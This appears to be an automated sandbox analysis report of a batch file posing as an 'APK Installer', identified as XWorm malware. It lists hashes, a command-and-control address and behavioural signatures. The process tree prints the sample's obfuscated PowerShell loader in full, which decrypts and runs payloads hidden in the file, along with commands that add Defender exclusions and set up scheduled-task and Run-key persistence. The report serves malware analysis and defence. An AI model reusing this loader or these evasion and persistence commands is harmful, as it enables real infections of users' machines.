Analysis
-
max time kernel
27s -
max time network
29s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
31-05-2024 11:44
Static task
static1
Behavioral task
behavioral1
Sample
APK_Installer.bat
Resource
win11-20240508-en
General
-
Target
APK_Installer.bat
-
Size
302KB
-
MD5
7a5f5944302b8298714b56ae2f138b7c
-
SHA1
669b42f2f6e76895899d84d5ad7a12f23d951f13
-
SHA256
3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
-
SHA512
73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
SSDEEP
6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj
Malware Config
Extracted
xworm
19.ip.gl.ply.gg:38173
-
Install_directory
%Userprofile%
-
install_file
Runtime Broker.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4356-48-0x000001FB27F90000-0x000001FB27FAA000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1116 powershell.exe 1132 powershell.exe 4356 powershell.exe 4092 powershell.exe 1176 powershell.exe 1064 powershell.exe 1748 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Admin\\Runtime Broker.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 2 IoCs
Processes:
powershell.exeMiniSearchHost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1116 powershell.exe 1116 powershell.exe 1132 powershell.exe 1132 powershell.exe 4356 powershell.exe 4356 powershell.exe 4092 powershell.exe 4092 powershell.exe 1176 powershell.exe 1176 powershell.exe 1064 powershell.exe 1064 powershell.exe 1748 powershell.exe 1748 powershell.exe 4356 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeIncreaseQuotaPrivilege 1132 powershell.exe Token: SeSecurityPrivilege 1132 powershell.exe Token: SeTakeOwnershipPrivilege 1132 powershell.exe Token: SeLoadDriverPrivilege 1132 powershell.exe Token: SeSystemProfilePrivilege 1132 powershell.exe Token: SeSystemtimePrivilege 1132 powershell.exe Token: SeProfSingleProcessPrivilege 1132 powershell.exe Token: SeIncBasePriorityPrivilege 1132 powershell.exe Token: SeCreatePagefilePrivilege 1132 powershell.exe Token: SeBackupPrivilege 1132 powershell.exe Token: SeRestorePrivilege 1132 powershell.exe Token: SeShutdownPrivilege 1132 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeSystemEnvironmentPrivilege 1132 powershell.exe Token: SeRemoteShutdownPrivilege 1132 powershell.exe Token: SeUndockPrivilege 1132 powershell.exe Token: SeManageVolumePrivilege 1132 powershell.exe Token: 33 1132 powershell.exe Token: 34 1132 powershell.exe Token: 35 1132 powershell.exe Token: 36 1132 powershell.exe Token: SeIncreaseQuotaPrivilege 1132 powershell.exe Token: SeSecurityPrivilege 1132 powershell.exe Token: SeTakeOwnershipPrivilege 1132 powershell.exe Token: SeLoadDriverPrivilege 1132 powershell.exe Token: SeSystemProfilePrivilege 1132 powershell.exe Token: SeSystemtimePrivilege 1132 powershell.exe Token: SeProfSingleProcessPrivilege 1132 powershell.exe Token: SeIncBasePriorityPrivilege 1132 powershell.exe Token: SeCreatePagefilePrivilege 1132 powershell.exe Token: SeBackupPrivilege 1132 powershell.exe Token: SeRestorePrivilege 1132 powershell.exe Token: SeShutdownPrivilege 1132 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeSystemEnvironmentPrivilege 1132 powershell.exe Token: SeRemoteShutdownPrivilege 1132 powershell.exe Token: SeUndockPrivilege 1132 powershell.exe Token: SeManageVolumePrivilege 1132 powershell.exe Token: 33 1132 powershell.exe Token: 34 1132 powershell.exe Token: 35 1132 powershell.exe Token: 36 1132 powershell.exe Token: SeIncreaseQuotaPrivilege 1132 powershell.exe Token: SeSecurityPrivilege 1132 powershell.exe Token: SeTakeOwnershipPrivilege 1132 powershell.exe Token: SeLoadDriverPrivilege 1132 powershell.exe Token: SeSystemProfilePrivilege 1132 powershell.exe Token: SeSystemtimePrivilege 1132 powershell.exe Token: SeProfSingleProcessPrivilege 1132 powershell.exe Token: SeIncBasePriorityPrivilege 1132 powershell.exe Token: SeCreatePagefilePrivilege 1132 powershell.exe Token: SeBackupPrivilege 1132 powershell.exe Token: SeRestorePrivilege 1132 powershell.exe Token: SeShutdownPrivilege 1132 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeSystemEnvironmentPrivilege 1132 powershell.exe Token: SeRemoteShutdownPrivilege 1132 powershell.exe Token: SeUndockPrivilege 1132 powershell.exe Token: SeManageVolumePrivilege 1132 powershell.exe Token: 33 1132 powershell.exe Token: 34 1132 powershell.exe Token: 35 1132 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
powershell.exeMiniSearchHost.exepid process 4356 powershell.exe 2304 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 3020 wrote to memory of 1116 3020 cmd.exe powershell.exe PID 3020 wrote to memory of 1116 3020 cmd.exe powershell.exe PID 1116 wrote to memory of 1132 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 1132 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 2144 1116 powershell.exe WScript.exe PID 1116 wrote to memory of 2144 1116 powershell.exe WScript.exe PID 2144 wrote to memory of 2296 2144 WScript.exe cmd.exe PID 2144 wrote to memory of 2296 2144 WScript.exe cmd.exe PID 2296 wrote to memory of 4356 2296 cmd.exe powershell.exe PID 2296 wrote to memory of 4356 2296 cmd.exe powershell.exe PID 4356 wrote to memory of 4092 4356 powershell.exe powershell.exe PID 4356 wrote to memory of 4092 4356 powershell.exe powershell.exe PID 4356 wrote to memory of 1176 4356 powershell.exe powershell.exe PID 4356 wrote to memory of 1176 4356 powershell.exe powershell.exe PID 4356 wrote to memory of 1064 4356 powershell.exe powershell.exe PID 4356 wrote to memory of 1064 4356 powershell.exe powershell.exe PID 4356 wrote to memory of 1748 4356 powershell.exe powershell.exe PID 4356 wrote to memory of 1748 4356 powershell.exe powershell.exe PID 4356 wrote to memory of 3108 4356 powershell.exe schtasks.exe PID 4356 wrote to memory of 3108 4356 powershell.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_23_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_23.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_23.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_23.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_23.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_23.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1748
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"6⤵
- Creates scheduled task(s)
PID:3108
-
-
-
-
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2304
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD559d37a8c588c83e806678c7fb5d1229f
SHA14396d68567f30f08e08a269802fe3f4784b88c5b
SHA256c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84
SHA51219223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2
-
Filesize
944B
MD52ab9885ed803576dfcb4df976a3e7ca0
SHA149a54d1bb797dca76c41f6af288f9df6c705cf56
SHA2569a7f8ca5a6bfcd5839a1cd029a116378bec3be1baec9db19bbe4f127199fb322
SHA512b1f90e17c21425cd94a7f00438386ae40c7414784a96694432e340e35ba6a60e1176a2871a732474db4bd7080ebdbf4c476b61efa49fedf8208b382252ae25ba
-
Filesize
944B
MD54ae54c3a00d1d664f74bfd4f70c85332
SHA167f3ed7aaea35153326c1f907c0334feef08484c
SHA2561e56a98f74d4a604bef716b47ef730d88f93aec57a98c89aa4423394cbc95b5c
SHA512b3bbdefeaadbdaac00f23ce3389bbd3b565bd7e0079aeebf3e4afba892382e1cd3896c00bb2e5a98146ac593f9bdc5568d0bd08c5b0139f0814b1a38911c3889
-
Filesize
944B
MD58b1394bd98c93d68bb4151a8c8c4015b
SHA13c5695c58a2186c1a13e70d8de9343f660429a91
SHA2563d46aa2ace9880ec7c1eb00581078beb3ca2107f343654aa5d5e250c97bf67d8
SHA512b7fe198d72b322dd2b2badf038821af9ceccae8b506f7475d8c253ea40aef9b0ba50dae223d5251d72a14aec81d025d394d3277576125d03f3e4ec393459a607
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize11KB
MD5cd56e155edf53e5728c46b6c9eb9c413
SHA114b1b0f090803c9ee39797aed4af13dc7849566d
SHA25670a6cf268c013fb4d907bedc12af3e5f802f179f0cc8353c7b8227dde840d31a
SHA512a4ada455d44a89fd2baa505aa9266b70913967b839522ef5da8d7afd31af6662c3ad96ac3e3531d82a72be7d019c9d88f1ce391c5b5fa0e4422a634c51491165
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
Filesize11KB
MD53569ff1aa5310102ef02c312ca4dbe9a
SHA14124b1e805d5c487bf86182d19ed22bed6cf44ac
SHA2563ce1168408eb889f65cd4d45c12c58842a4291356c835cfb1877d017b6768a9b
SHA512c966ebf69abce51aa4fbec1e53f43485786cbeb5fb6cea18eb3407b7d4c7a212a6843b69965de9f577c483c6139840d0f7fe56d69fc8c97e6b0884b75b7aed8d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
302KB
MD57a5f5944302b8298714b56ae2f138b7c
SHA1669b42f2f6e76895899d84d5ad7a12f23d951f13
SHA2563f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552
SHA51273049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120
-
Filesize
114B
MD5b5d435d40e89e0e13014958be34193f2
SHA1cccbb0d88f55ce2000033ceb56b0b866e5eb1ff6
SHA2564d246b9a3e28a38de80c1cb1fe8d5cfe67ba72964f18b167afd84b74bfe1e10a
SHA5120984e0a24e3309cc8302dee1ee2a491859918aade428364c0b3f1034103273b683a4bc9ff2368f0a00e0a06812e64702317691fd20077423acd7b779b321924f